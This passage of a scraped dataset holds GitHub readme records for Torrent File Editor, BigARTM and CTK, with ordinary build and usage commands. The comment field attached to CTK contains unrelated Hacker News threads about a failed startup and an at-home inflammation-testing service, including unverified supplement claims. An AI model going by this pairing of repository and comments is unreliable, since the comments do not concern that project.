Status](https://travis-ci.org/torrent-file-editor/torrent-file-editor.svg?branch=master)](https://travis-ci.org/torrent-file-editor/torrent-file-editor)\n[![Crowdin](https://d322cqt584bo4o.cloudfront.net/torrent-file-editor/localized.svg)](https://crowdin.com/project/torrent-file-editor)\n[![Version](https://badge.fury.io/gh/torrent-file-editor%2Ftorrent-file-editor.svg)](https://badge.fury.io/gh/torrent-file-editor%2Ftorrent-file-editor)\n\nTorrent File Editor\n===================\n\nQt based GUI tool designed to create and edit .torrent files\n\nAuthor: Ivan Romanov <[drizt72@zoho.eu](mailto:drizt72@zoho.eu)> \nLicense: GNU General Public License v3.0 or later \nHomepage: https://torrent-file-editor.github.io \nSources: https://github.com/torrent-file-editor/torrent-file-editor \nCrowdin translations: https://crowdin.com/project/torrent-file-editor\n\nBuild Instructions\n------------------\n\nNeed to have\n - CMake >= 2.8.11\n - Qt4 or Qt5\n - QJSON >= 0.8.0 if used Qt4\n - [Sparkle](http://sparkle-project.org/) only for Mac OS X\n\n**Linux:**\n\nWill build Qt4 version by default\n\n mkdir build && cd build\n cmake -DCMAKE_BUILD_TYPE=Release -DQT5_BUILD=OFF ..\n make\n\nIf building Qt5 version on Ubuntu 18.04+, install required Qt5LinguistTools from `qttools5-dev` package.\n\n**Mac OS X:**\n\nOnly Qt5 version\n\n mkdir build && cd build\n cmake -DCMAKE_BUILD_TYPE=Release ..\n make\n make dmg # to build dmg package\n\n**Windows important note**\n\nOnly Qt4 version for a while.\nI use Fedora 26 MinGW to build Windows versions. Furthermore I build\nportable static versions. Any other build way is not tested and may\nnot work. It is on my TODO list.\n\nFedora hasn't a MinGW QJSON package. You need to build your own version.\nIt is easy:\n\n wget https://github.com/flavio/qjson/archive/master.tar.gz -O qjson-master.tar.gz\n tar zxf qjson-master.tar.gz\n mkdir qjson-master/win32\n mkdir qjson-master/win64\n cd qjson-master/win32\n mingw32-cmake -DCMAKE_BUILD_TYPE=Release -DBUILD_SHARED_LIBS=OFF -DQT4_BUILD=ON -DQT_INCLUDE_DIRS_NO_SYSTEM=ON -DQT_USE_IMPORTED_TARGETS=OFF ..\n make\n sudo make install # will be careful, it installs qjson to system folders\n cd ../win64\n mingw64-cmake -DCMAKE_BUILD_TYPE=Release -DBUILD_SHARED_LIBS=OFF -DQT4_BUILD=ON -DQT_INCLUDE_DIRS_NO_SYSTEM=ON -DQT_USE_IMPORTED_TARGETS=OFF ..\n make\n sudo make install # be careful, it installs qjson to system folders\n\n**Windows x32:**\n\n mkdir build && cd build\n mingw32-cmake -DCMAKE_BUILD_TYPE=Release ..\n make\n\n**Windows x64:**\n\n mkdir build && cd build\n mingw64-cmake -DCMAKE_BUILD_TYPE=Release ..\n make\n\nHow Can I Help?\n---------------\n\nThe Project is translated from English to several languages.\nI would be glad if you add new translations. You can translate the\nproject to your native language with [Crowdin](https://crowdin.com/project/torrent-file-editor).\nIt is not difficult and no special knowledges are required.\nOr you can correct my English. I know it is not good. Anyway you can\nalways email <[drizt72@zoho.eu](mailto:drizt72@zoho.eu)> me.\n\nAlso feel free to open an issue on GitHub or send me pull requests.\n\n**Translations**\n\n Afrikaans - Afrikaans \n \u0627\u0644\u0639\u0631\u0628\u064a\u0629 - Arabic \n \u09ac\u09be\u0982\u09b2\u09be - Bengali \n \u7b80\u4f53\u4e2d\u6587 - Chinese Simplified \n \u7e41\u9ad4\u4e2d\u6587 - Chinese Traditional \n \u010ce\u0161tina - Czech \n Nederlands - Dutch \n English - English \n Suomi - Finnish \n Fran\u00e7ais - French \n Deutsch - German \n \u05e2\u05d1\u05e8\u05d9\u05ea\u200e - Hebrew \n Magyar - Hungarian \n Indonesia - Indonesian \n Italiano - Italian \n \u65e5\u672c\u8a9e - Japanese \n \ud55c\uad6d\uc5b4 - Korean \n Polski - Polish \n Portugu\u00eas (Brasil) - Portuguese (Brazil) \n Rom\u00e2n\u0103 - Romanian \n \u0420\u0443\u0441\u0441\u043a\u0438\u0439 - Russian \n Espa\u00f1ol - Spanish \n T\u00fcrk\u00e7e - Turkish \n Ti\u1ebfng Vi\u1ec7t - Vietnamese \n \u0423\u043a\u0440\u0430\u0457\u0301\u043d\u0441\u044c\u043a\u0430 - Ukrainian \n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "bigartm/bigartm", "link": "https://github.com/bigartm/bigartm", "tags": ["topic-modeling", "c-plus-plus", "python", "bigartm", "regularizer", "python-api", "text-mining", "machine-learning", "bigdata"], "stars": 639, "description": "Fast topic modeling platform", "lang": "C++", "repo_lang": "", "readme": "

\n\t\"BigARTM\n

\n\nThe state-of-the-art platform for topic modeling.\n\n[![Build Status](https://secure.travis-ci.org/bigartm/bigartm.png)](https://travis-ci.org/bigartm/bigartm)\n[![Windows Build Status](https://ci.appveyor.com/api/projects/status/i18k840shuhr2jtk/branch/master?svg=true)](https://ci.appveyor.com/project/bigartm/bigartm)\n[![GitHub license](https://img.shields.io/badge/license-New%20BSD-blue.svg)](https://raw.github.com/bigartm/bigartm/master/LICENSE.txt)\n[![DOI](https://zenodo.org/badge/DOI/10.5281/zenodo.288960.svg)](https://doi.org/10.5281/zenodo.288960)\n\n - [Full Documentation](http://docs.bigartm.org/)\n - [User Mailing List](https://groups.google.com/forum/#!forum/bigartm-users)\n - [Download Releases](https://github.com/bigartm/bigartm/releases)\n - [User survey](http://goo.gl/forms/tr5EsPMcL2)\n\n\n# What is BigARTM?\n\nBigARTM is a powerful tool for [topic modeling](https://en.wikipedia.org/wiki/Topic_model) based on a novel technique called Additive Regularization of Topic Models. This technique effectively builds multi-objective models by adding the weighted sums of regularizers to the optimization criterion. BigARTM is known to combine well very different objectives, including sparsing, smoothing, topics decorrelation and many others. Such combination of regularizers significantly improves several quality measures at once almost without any loss of the perplexity.\n\n### References\n\n* Vorontsov K., Frei O., Apishev M., Romov P., Dudarenko M. BigARTM: [Open Source Library for Regularized Multimodal Topic Modeling of Large Collections](https://s3-eu-west-1.amazonaws.com/artm/Voron15aist.pdf) // Analysis of Images, Social Networks and Texts. 2015.\n* Vorontsov K., Frei O., Apishev M., Romov P., Dudarenko M., Yanina A. [Non-Bayesian Additive Regularization for Multimodal Topic Modeling of Large Collections](https://s3-eu-west-1.amazonaws.com/artm/Voron15cikm-tm.pdf) // Proceedings of the 2015 Workshop on Topic Models: Post-Processing and Applications, October 19, 2015 - pp. 29-37.\n* Vorontsov K., Potapenko A., Plavin A. [Additive Regularization of Topic Models for Topic Selection and Sparse Factorization.](https://s3-eu-west-1.amazonaws.com/artm/voron15slds.pdf) // Statistical Learning and Data Sciences. 2015 \u2014 pp. 193-202.\n* Vorontsov K. V., Potapenko A. A. [Additive Regularization of Topic Models](https://s3-eu-west-1.amazonaws.com/artm/voron-potap14artm-eng.pdf) // Machine Learning Journal, Special Issue \u201cData Analysis and Intelligent Optimization\u201d, Springer, 2014.\n* More publications can be found in our [wiki page](https://github.com/bigartm/bigartm/wiki/Publications).\n\n### Related Software Packages\n\n- [TopicNet](https://github.com/machine-intelligence-laboratory/TopicNet/) is a high-level interface for BigARTM which is helpful for rapid solution prototyping and for exploring the topics of finished ARTM models.\n- [David Blei's List](http://www.cs.columbia.edu/~blei/topicmodeling_software.html) of Open Source topic modeling software\n- [MALLET](http://mallet.cs.umass.edu/topics.php): Java-based toolkit for language processing with topic modeling package\n- [Gensim](https://radimrehurek.com/gensim/): Python topic modeling library\n- [Vowpal Wabbit](https://github.com/JohnLangford/vowpal_wabbit) has an implementation of [Online-LDA algorithm](https://github.com/JohnLangford/vowpal_wabbit/wiki/Latent-Dirichlet-Allocation)\n\n\n# Installation\n### Installing with pip (Linux only)\n\nWe have a PyPi release for Linux:\n```bash\n$ pip install bigartm\n```\nor \n```bash\n$ pip install bigartm10\n```\n\n### Installing on Windows\nWe suggest [using pre-build binaries](https://bigartm.readthedocs.io/en/master/installation/windows.html).\n\nIt is also possible to [compile C++ code on Windows](https://bigartm.readthedocs.io/en/master/devguide/dev_build_windows.html) you want the latest development version.\n\n### Installing on Linux / MacOS\nDownload [binary release](https://github.com/bigartm/bigartm/releases) or build from source using cmake:\n```bash\n$ mkdir build && cd build\n$ cmake ..\n$ make install\n```\n\nSee [here](https://bigartm.readthedocs.io/en/master/installation/linux.html) for detailed instructions.\n\n# How to Use\n\n### Command-line interface\n\nCheck out [documentation for `bigartm`](http://docs.bigartm.org/en/latest/tutorials/bigartm_cli.html).\n\nExamples:\n\n* Basic model (20 topics, outputed to CSV-file, inferred in 10 passes)\n\n```bash\nbigartm.exe -d docword.kos.txt -v vocab.kos.txt --write-model-readable model.txt\n--passes 10 --batch-size 50 --topics 20\n```\n\n* Basic model with less tokens (filtered extreme values based on token's frequency)\n```bash\nbigartm.exe -d docword.kos.txt -v vocab.kos.txt --dictionary-max-df 50% --dictionary-min-df 2\n--passes 10 --batch-size 50 --topics 20 --write-model-readable model.txt\n```\n\n* Simple regularized model (increase sparsity up to 60-70%)\n```bash\nbigartm.exe -d docword.kos.txt -v vocab.kos.txt --dictionary-max-df 50% --dictionary-min-df 2\n--passes 10 --batch-size 50 --topics 20 --write-model-readable model.txt \n--regularizer \"0.05 SparsePhi\" \"0.05 SparseTheta\"\n```\n\n* More advanced regularize model, with 10 sparse objective topics, and 2 smooth background topics\n```bash\nbigartm.exe -d docword.kos.txt -v vocab.kos.txt --dictionary-max-df 50% --dictionary-min-df 2\n--passes 10 --batch-size 50 --topics obj:10;background:2 --write-model-readable model.txt\n--regularizer \"0.05 SparsePhi #obj\"\n--regularizer \"0.05 SparseTheta #obj\"\n--regularizer \"0.25 SmoothPhi #background\"\n--regularizer \"0.25 SmoothTheta #background\" \n```\n\n### Interactive Python interface\n\nBigARTM supports full-featured and clear Python API (see [Installation](http://docs.bigartm.org/en/latest/installation/index.html) to configure Python API for your OS).\n\nExample:\n\n```python\nimport artm\n\n# Prepare data\n# Case 1: data in CountVectorizer format\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.datasets import fetch_20newsgroups\nfrom numpy import array\n\ncv = CountVectorizer(max_features=1000, stop_words='english')\nn_wd = array(cv.fit_transform(fetch_20newsgroups().data).todense()).T\nvocabulary = cv.get_feature_names()\n\nbv = artm.BatchVectorizer(data_format='bow_n_wd',\n n_wd=n_wd,\n vocabulary=vocabulary)\n\n# Case 2: data in UCI format (https://archive.ics.uci.edu/ml/datasets/Bag+of+Words)\nbv = artm.BatchVectorizer(data_format='bow_uci',\n collection_name='kos',\n target_folder='kos_batches')\n\n# Learn simple LDA model (or you can use advanced artm.ARTM)\nmodel = artm.LDA(num_topics=15, dictionary=bv.dictionary)\nmodel.fit_offline(bv, num_collection_passes=20)\n\n# Print results\nmodel.get_top_tokens()\n```\n\nRefer to [tutorials](http://docs.bigartm.org/en/latest/tutorials/python_tutorial.html) for details on how to start using BigARTM from Python, [user's guide](http://docs.bigartm.org/en/latest/tutorials/python_userguide/index.html) can provide information about more advanced features and cases.\n\n### Low-level API\n\n - [C++ Interface](http://docs.bigartm.org/en/latest/api_references/cpp_interface.html)\n - [Plain C Interface](http://docs.bigartm.org/en/latest/api_references/c_interface.html)\n\n\n## Contributing\n\nRefer to the [Developer's Guide](http://docs.bigartm.org/en/latest/devguide.html) and follows [Code Style](https://github.com/bigartm/bigartm/wiki/Code-style).\n\nTo report a bug use [issue tracker](https://github.com/bigartm/bigartm/issues). To ask a question use [our mailing list](https://groups.google.com/forum/#!forum/bigartm-users). Feel free to make [pull request](https://github.com/bigartm/bigartm/pulls).\n\n\n## License\n\nBigARTM is released under [New BSD License](https://raw.github.com/bigartm/bigartm/master/LICENSE) that allowes unlimited redistribution for any purpose (even for commercial use) as long as its copyright notices and the license\u2019s disclaimers of warranty are maintained.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "commontk/CTK", "link": "https://github.com/commontk/CTK", "tags": ["c-plus-plus", "qt", "medical-imaging", "python", "vtk", "itk", "dicom", "plugin-manager", "osgi", "3d-slicer", "mitk", "open-source", "cross-platform"], "stars": 639, "description": "A set of common support code for medical imaging, surgical navigation, and related purposes.", "lang": "C++", "repo_lang": "", "readme": "Common Toolkit\r\n==============\r\n\r\n.. image:: https://circleci.com/gh/commontk/CTK.png?style=shield\r\n :target: https://circleci.com/gh/commontk/CTK\r\n\r\nThe Common Toolkit is a community effort to provide support code for medical image analysis,\r\nsurgical navigation, and related projects.\r\n\r\nSee http://commontk.org\r\n\r\nBuild Instructions\r\n==================\r\n\r\nConfigure the project using CMake.\r\n\r\nFor Qt5, specify the following:\r\n - ``CTK_QT_VERSION``: 5\r\n - ``QT5_DIR``: C:\\Qt\\5.15.0\\msvc2019_64\\lib\\cmake\\Qt5 (or something similar, depending on operating system)\r\n - ``VTK_MODULE_ENABLE_VTK_GUISupportQt``: YES (for enabling VTK widgets)\r\n - ``VTK_MODULE_ENABLE_VTK_ViewsQt``: YES (for enabling VTK view widgets)\r\n\r\nNote: make sure your built toolchain version is compatible with the chosen Qt version. For example if trying to build with Qt-5.12 and Microsoft Visual Studio 2019, then build will fail with the error `error LNK2019: unresolved external symbol \"__declspec(dllimport) public: __cdecl QLinkedListData::QLinkedListData(void)\"`. The solution is to either change the toolset version to an earlier one (e.g., Visual Studio 2017) or upgrade Qt (e.g., use Qt-5.15 with Visual Studio 2019).\r\n", "readme_type": "rst", "hn_comments": "I\u2019m sorry that happened - that was hard to read :(In my opinion, in ANY relationship if someone demands full control of all communication, then they are trying to hide something.It's good general advice, though every tip of course has many counterexamples. I think the reality is startups are hard and also require luck.Your mistake is classic, you didn't have a product, then released a pile of shit and failed.Build a solid working product before anything else, and get to at least parity with your 'competition' before releasing, and obviously test it.It\u2019s not clear how this 200k was spent. In terms of team composition, age of your startup.So some more context would be nice.Ok, but how do I get the $200k to begin with? ;)I don't have the experience you have so I don't know what I can add but I am a laborer. You are blaming your team here but a lot of what you are discussing are strategic errors. How is your team responsible? Their code was just very buggy and you trusted it to work?It would be nice to know how you actually lost it, before diving into advice.> 1. Do not trust people blindly, especially your team.This was the number mistake my cofounder Oscar, and I made. We trusted our team blindly.Care to elaborate?[dead]> We trusted our team blindly.What happened?It is good advice. Not fully agree with 5 tough. You need both, stability and UX. Cemeteries are full of stable products that were hard to use.Not to dismiss your points, but if you are going to title the post \u201cI lost 200k\u201d it\u2019d be nice to at least explain where the money went. Was it routine operating expenses that ultimately went to fund a failed product, or something more nefarious (#1 hints at that).> Today, I am sharing the learning lessons so that you do not make the mistakes I made.> 1. Do not trust people blindly, especially your team.> This was the number mistake my cofounder Oscar, and I made. We trusted our team blindly.Your number-one mistake was trusting your team?That sounds like it could be finger-pointing downwards by a leader, so you might want to expound, or reconsider.For example, even if the entire startup team turned out to be dishonest and incompetent, weren't those clowns were hired and led by the founders? If so, the buck might stop with the founders, so maybe there's a better way to characterize and learn from the failure.Our startup import export business lost about $5MM in one transaction over Covid when the Vietnamese mafia / corrupt factory decided to say YOLO and keep our cash.Still haven\u2019t recovered anything.I'm interested in \"build an audience before building a product\" - classically you would determine a target market/niche, build an MVP, and then attempt to market it, refine it with early customers. What kind of audience and conversations can you have without _any_ product? I've seen more than one startup fail by investing into marketing without having anything to market ready. But I'm curious in other experiences.Everything here could be wrong or right depending on your individual situation.No two companies are the same. Take advice (or insight) with a grain of salt.All great advice, but maybe a bit overindexing and fighting the last war?There's not enough detail on what happened, the product, market, etc. to get anything out of this. I fell for the clickbait title but was just confusedFor context, this one was about an email marketing tool.Sorry to hear about that. We also bootstrapped our product and put about $60k in it. We built a product within a week and went out to sell. Having a technical founder(that doesn't take salary + someone you have known for years)is important. I understand the stress. Don't let them bring you down. You will come back stronger.How many did you hire?I like #7 very much. One should talk a lot about your concept before building it. Don\u2019t worry about anyone stealing your idea.tl;dr: The author is sharing lessons learned from their experience building and launching a product. They advise against building an all-in-one tool and recommend testing and selling to at least 1,000 paying users before building more. They also suggest following a systematic launch cycle and validating ideas with paying customers before building. They also advise building an audience before building a product, splitting large visions into smaller projects, and focusing on the most requested feature by buyers in the early stages. They mention mistakes they made, including blindly trusting their team, which led to delays and stability issues, and ultimately, a loss of over $200,000 and depression. They also suggest the importance of QA during the early stage.Good bot yes yes, I'm working on a news summary thingo for myself and this was in my open tabs.> We trusted our team blindly.What did you trust them to do?I feel like I hear this sentiment fairly often in the context of startup mistakes, and I wonder if people simply have unrealistic expectations.Developers write software, and they usually aren\u2019t magicians. They can\u2019t always turn poor instructions or bad ideas into world class software.I\u2019ve worked on teams where the software we were building simply wasn\u2019t great. It would never be great without some degree of pivoting and addressing a market more appropriately with better solutions. This was never a developer\u2019s fault, though. In fact the team could be killing in terms of getting the work done that they were asked to. Even so it often came down on the software team to do better somehow. Numbers aren\u2019t right, we need to optimize. We need to do the thing faster. Joey spent two weeks doing X, that should never happen!But even if Joey did X in two minutes, customers still wouldn\u2019t be very excited. Organic growth would remain poor. Trials would not convert very well.Some developers have a good enough sense of the bigger picture, business, marketing, their own trade, etc. and they can provide feedback and insight that\u2019ll potentially help change course. This is rarely true or even sufficient in my experience. Developers are only one of the cogs in the software machine.Did you team lie about their abilities? Did they falsely report hours worked? I\u2019m really curious where your trust went and how you were let down.Should be \u201eTell hn\u201c, also you might want to change the title to something including \u201eStartup\u201c and \u201elessons learned\u201c, then it might track better!https://www.tubebuddy.com/clickmagnetThis is the link to their site, if anyone has any information I'd love to hear it![1] https://www.nature.com/articles/s41591-019-0675-0, plus sources on this page: https://www.begolden.online/post/lifestyle-interventions-ass...[2] See the Nature article in [1] plus sources on this page: https://www.begolden.online/post/scientific-articles-on-the-...).[3] https://pubmed.ncbi.nlm.nih.gov/19223918/,https://academic.o..., https://pubmed.ncbi.nlm.nih.gov/17909397/[4] https://www.sciencedirect.com/topics/neuroscience/c-reactive..., https://www.nejm.org/doi/full/10.1056/nejm200003233421202, https://www.clevelandheartlab.com/wp-content/uploads/2020/04...[5] https://www.health.harvard.edu/staying-healthy/understanding...[6] https://www.nature.com/articles/s41591-019-0675-0, https://www.clinicaltherapeutics.com/article/S0149-2918%2819...[7] https://www.nature.com/articles/s41591-019-0675-0, https://www.health.harvard.edu/staying-healthy/understanding...[8] https://www.ncbi.nlm.nih.gov/pmc/articles/PMC4369762/[9] https://www.ncbi.nlm.nih.gov/pmc/articles/PMC6831096/ ,https://www.mdpi.com/1422-0067/22/11/5421/htm, https://www.nature.com/articles/s41591-019-0675-0, https://www.cell.com/fulltext/S0092-8674(10)00060-7[10] https://www.nature.com/articles/s41392-021-00658-5, https://www.ncbi.nlm.nih.gov/pmc/articles/PMC6831096/, https://www.mdpi.com/1422-0067/22/11/5421/htm[11] https://www.nature.com/articles/s41392-021-00658-5The concept of quantifying inflammation is definitely interesting - best of luck and excited to see how this plays out!Can you ship to and from Europe?This sounds like you're doing research. You're trying to gather data on daily habits and interventions taken by subjects and then looking at the impact on their blood marker levels. That is normally something that would happen in a randomized controlled trial or possibly epidemiological retrospective if you're doing pure data mining, and the research subjects would at worst be volunteers, but might even be paid. This feels like you're asking research subjects to pay to be research subjects so they can take your treatments that you don't yet have evidence for.I don't mean to sound like I'm impugning your ethics, but why are you doing this as a startup and not a research proposal? Is it normal for YCombinator to fund medical research?Well it looks nice and shiny! But I'm afraid it's absolutely a revamp of uBiome. This sort of remote diagnosis simply can't be done to any degree of accuracy with a single pinprick blood sample. You need a significant program of investigation before you can start trying to isolate what you're looking for. Diagnosis of this type is incredibly complicated because there are so many variables - internal and external - involved.And at those astronomical costs, the customer will go bust long before any meaningful results/benefits acrue. Not trying to be rude, but this is one of those projects which looks fantastic on a marketing slide deck, but in practice it's woefully inadequate. My only suggestion would be to pivot to a much more focused niche as soon as you can. One which can be reliable with minimal inputs.I recently also developed an App to help me figure out my IBS and digestion problems. Basically i looked at all the apps in the app store but did not found a simple to use app. Inserting your meals should really be as simple as it possibly can, otherwise you will end up not using it at all.If anyone is interested, it is currently available in the google app store. Apple coming soon. Foodolyst:\nhttps://play.google.com/store/apps/details?id=studio.creatne...Also available as a webapp: https://app.foodolyst.creatness.studioThe app works in German&English. I haven't proof read every English entry however, so feedback is very much welcomed. I can return lifetime premium access in return :)Okay enough advertising, sorry but the topic is quite interesting and everyone with food problems can just benefit from this.Interesting approach, thanks for the good reads. Would love to support, no strings attached, if you see an opportunity. Reached out on LI, feel free to dump the request if this feels off to you.Congrats on launching!Compliments first - you described your elevator pitch of the company incredibly well in the starter post here on HN, to the point I'd use that as a template on your site and any kind of social media materials. Fantastic way to explain what the isasue is and how you're tackling it in a novel but practical way.My immediate thought is \"cool idea, but a non starter for me personally when I have a lot of questions about data and privacy\" and how the team's handling patient's data. I'd highly encourage you to have a whole page at minimum elucidating the details there, if you're using E2E encryption, all that jazz. Given people's recent concerns about data collecting and menstrual cycles and the recent Roe fallout, this is of special concern to me as a woman.Wishing you and the team best of luck, all the same!Congrats on the launch! Interested to know if my inflammation score will be aWhy do you test for hsCRP and not CRP?What exactly can I learn from my hsCRP values?\nWhat can I learn from hsCRP that I can't learn from CRP?hsCRP is a very sensitive marker.\nIf I'd exercise the day before the test and my values would be elevated?\nWhat would I learn from my result in this case?Will your provide explanations of what influences my individual hsCRP levels and what specific interventions I should take in case they are elevated?What is your process if you detect abnormally high hsCRP values?\nHow do you alert your customers of their possibly lethal condition?How does your service provide value to me as a customer apart from me not needing to go to a lab/doctor to get tested?Anyways, I don't see much value in getting just hsCRP tested standalone without any other meaningful context.\nWhat about my iron levels? Vitamins? Lipid profile? IgG, IgA? HBa1c. On and on it goes.\nThere is a reason that medical doctors collect a host of lab data to make informed decisions about their patients health and which possible interventions induce postive change without interdicting harmful side effects.Very interesting. I remember seeing data in the early days of Covid that CRP was quite correlated with severityCool! A couple suggestions:1 - the CSS is all over the place on mobile, it looks pretty bad.2 - maybe adjust the pricing of the bulk a bit. I assume you want to sell the bulk packs more, so incentivize them more.Instead of $74 for 1 / $69 for 2, make it like $79 for 1 and $64 for 2, and make sure you say that\u2019s \u201csaving $30\u201d. Right now it feels like it\u2019s only $5 off which doesn\u2019t convince me (yes I know it\u2019s $10 actually).I've noticed that my C Reactive Protein were always high when I was taking creatine and doing strength training and wasn't sure which was the culprit. Likely both. Is there a way to account or correct for high hsCRP related to exercise or is the recommendation to do less intense exercise?I am a very inflammable (inflammed? not sure the terminology) person - allergic to pretty much everything, ezcema, IBS.I've been to specialist doctors for all these things and they've mostly basically told me to go fuck myself (\"You have IBS, can't help you there. Be grateful it's not cancer. Next patient!\")Anyways, the finger prick thing kind of intimidates me but I think this is exactly what I need!Can I recommend an additional intervention to look into?https://en.m.wikipedia.org/wiki/Diosmin \u2014 a chemical relative of hesperidin (a blood thinner like curcumin), but not itself a blood thinner \u2014 rather, diosmin affects lymphatic channel contractile tone in about the same way that hesperidin affects blood-vessel contractile tone. I.e. it makes your body better at pumping lymph.Currently used by many for treatment of chronic veinous insufficiency (\u201cspider veins\u201d), as a side-effect of improved lymph flow is lower peripheral static pressure in cases of low veinous return rate. Also treats peripheral oedema, for similar reason. But that\u2019s just a side-effect.More interesting direct effect: it expedited wound healing (waste clearance from wound site), and decreases wound scarring. I.e. it makes your body do the thing it relies on your lymphatic system to do, faster and better. (Tattoos fade faster, even.)Consequently, diosmin is the active ingredient of a an oral OTC anti-hemorrhoid drug. Because, by improving wound healing + lowering scarring enough, your body can clear wastes/senescent cells/etc faster than they can form into a hemorrhoid.Obviously, a compound that can do this could be potentially of use in modulating all sorts of other inflammatory processes \u2014 but it\u2019s critically under-researched, especially in chronic inflammation.I monitor my hs-crp quite regularly (multiple times a year).1. How is this different from a test you can order?2. hs-crp is quite variable, especially for people who are predisposed to inflammation. I really don't know if I can make any sense of it [1]. Given that the plans on your website (but not this HN post) suggest a lower frequency than my own testing, I'm a bit skeptical of this product (or service).> For example, you may get an insight like - you have had ginger 15 of the last 30 days and your inflammation levels are down 10%.You have no proven numbers or data, and you're just saying you MAY find a correlation. Have you published anything that validates the efficacy of your product, other than an experiment with N=1?[1]: Edit/Add - From your own tracking sheet, how can you tell whether the first 2.9mg/L in your graph is not an outlier, since that's when you started measuring and hs-crp can be elevated for a number of reasons (cold, flu, infection, sleep, stress)? Maybe your baseline hs-crp is ~1mg/L.Add: there is no doubt that fitness improves hs-crp. My hs-crp before the pandemic (when I was playing every day) - 1.4mg/L. After 2 years of inactivity: 5mg/L.There will be a lot of iterations and improvements to your approach and the methodology.Despite that, it is high time that low impact chronic conditions are treated in a personalized manner - by noting patient specific conditions and using the variations caused by lifestyle changes - for improvements.Kudos to the team. Absolutely the step in the right direction[1] https://www.nature.com/articles/s41591-019-0675-0, plus sources on this page: https://www.begolden.online/post/lifestyle-interventions-ass...[2] See the Nature article in [1] plus sources on this page: https://www.begolden.online/post/scientific-articles-on-the-...).[3] https://pubmed.ncbi.nlm.nih.gov/19223918/,https://academic.o..., https://pubmed.ncbi.nlm.nih.gov/17909397/[4] https://www.sciencedirect.com/topics/neuroscience/c-reactive..., https://www.nejm.org/doi/full/10.1056/nejm200003233421202, https://www.clevelandheartlab.com/wp-content/uploads/2020/04...[5] https://www.health.harvard.edu/staying-healthy/understanding...[6] https://www.nature.com/articles/s41591-019-0675-0, https://www.clinicaltherapeutics.com/article/S0149-2918%2819...[7] https://www.nature.com/articles/s41591-019-0675-0, https://www.health.harvard.edu/staying-healthy/understanding...[8] https://www.ncbi.nlm.nih.gov/pmc/articles/PMC4369762/[9] https://www.ncbi.nlm.nih.gov/pmc/articles/PMC6831096/ ,https://www.mdpi.com/1422-0067/22/11/5421/htm, https://www.nature.com/articles/s41591-019-0675-0, https://www.cell.com/fulltext/S0092-8674(10)00060-7[10] https://www.nature.com/articles/s41392-021-00658-5, https://www.ncbi.nlm.nih.gov/pmc/articles/PMC6831096/, https://www.mdpi.com/1422-0067/22/11/5421/htm[11] https://www.nature.com/articles/s41392-021-00658-5Do you provide any context on the normally expected day-to-day variability in CRP levels? I imagine that getting spot checks once a month would require a few years (or perhaps decades) if data before signal could be reliability differentiated from noise in a given individual.Have you established anything like this in pre-production testing? At least something as simple as \"make no intentional changes to your lifestyle and test monthly for a year,\" and then institute your recommended lifestyle changes and test for another year? If so, it would be helpful data to make available (in a loud way -- I admit I read your post but haven't perused the website yet).Are there interventions that lower CRP but have no effect (or negative effects) on health? I agree with other commenters regarding the problems of surrogate markers...Congrats on the launch! Coming from the longevity space, I am interested to know if your test is suitable to determine the efficacy of the following?1. Meat vs Vegan Diet2. Intermittent Fasting vs No FastingIt\u2019s great to see more companies focusing on inflammation. Is it possible to create a device like a continuous glucose monitor but for inflammation?Do you contract with a third party lab to analyze the samples? If so, can you share which one?This is very interesting. However, our lifestyle is not very linear, meaning that we can have some period more stressful than over. In this context, how do you deal with confounding variables ? \nFor example, if my inflammation levels decrease in the next few weeks, it might be because I took some ginger everyday but it might also be because I had a less work and therefore more sleep.This is a great idea, but the website could be so much better. I felt like I wanted to be taken on a journey, of what is this? why does it matter to me? how does it work? how can I get involved? what's the projects future?I love the idea, and so do many others, hence why Theranos was able to raise what it did, the idea of having insight into our own health is exciting, intriguing, and important.I wish you the best of luck on your journey, but I would definitely improve on the site, if you have the resources to do so.Just wondering why focussed on home-testing for 3-4x the price versus working with a central lab that is optimized for lowering their costs. Especially private lab chains might be interestes in additional business.\nThe focus could be rather on results tracking & interpretation that could be done for example from remote doctors for more rural areas.Source: Worked for a diagnostic company and later on added value service for personal healthcare records. Super interesting project you work on:).Congratulations on your launch! We've had a lot of inquiries about inflammation when we see our patients at Wyndly (https://www.wyndly.com), so it's good to know someone is thinking about making this process easy!Do they use their own lab tests or use a third party like Quest labs which also let you order your own tests.https://questdirect.questdiagnostics.com/products/crp-inflam....online is an interesting TLD choice.Ug, why no shipping to New York?Useful service, and tried adding two tests, but decided to not order when I saw:Recurring subtotal\n$268.00 every 12 monthsDo not know if it is useful enough to renew, and I as a customer do not like services that presumptively charge me on and on and moves the onus to the customer to get out of the charging cycle.Thanks, useful service, but not for me.Thehttps://www.begolden.online/post/lifestyle-interventions-ass...link is downConfused. Is it accurate that you are logging self-reported data daily, but only running diagnostic tests few times a year at roughly $100 a test depending on how many tests the end user commits to upfront? If so, with that combination of data, how is there any hope of meaningful analysis based individual specific observations?Congratulations on your launch! I apologize in advance for my ignorant questions, but here they go.How can we be certain that inflammation is causing problems rather than just being an indicator that something is wrong? As in, if we start directly lowering inflammation with some drug or whatever, how do we know that it's helping rather than just masking the problem? So if someone is obese and inactive, but they start eating ginger to reduce their inflammation markers, would that improve quality of life?I guess the best example(as someone that is completely ignorant on the topic) I can come up with is heart rate and exercise. We know that an elevated heart rate when exercising is good and provides benefits. But increasing the heart rate with caffeine does not provide the same benefits.Coming from software where I can use a debugger to examine \"exactly\" what is going on in a program and an ex hardware engineer where we had simulators/models that were \"pretty accurate\", medicine/healthcare looks insane. We cannot model the human body accurately nor can we observe in great detail the processes that go on. I'm pretty amazed medicine is as good as it is with those limitations.Following up from my comment 2 days ago https://news.ycombinator.com/item?id=32656651 > Some quick research shows these tests can be ordered by the patients, themselves, for ~$60, so the same as the disccounted/offer price here.\n\n > LabCorp: https://www.ondemand.labcorp.com/lab-tests/inflammation-hs-c...\n\n > Quest: https://questdirect.questdiagnostics.com/products/crp-inflam... \n\nI ordered the test the same day, got an appointment for blood draw the next day, and I have the results now, 2 days after this launch.From the launch text:> measuring your baseline inflammation levels using an at-home, finger prick based, blood testing kit, that includes a shipping label to send the sample back to the lab.For my self-ordered test, the lab took a whole vial of blood, as opposed to Be Golden's finger-prick method. But I'm sure I got the results faster than I would have, if I had used the mail-in kit and waited for the results.All in all, I think this a valuable test, and available at a reasonable cost.Good luck to Be Golden. I hope they can bring the cost lower, 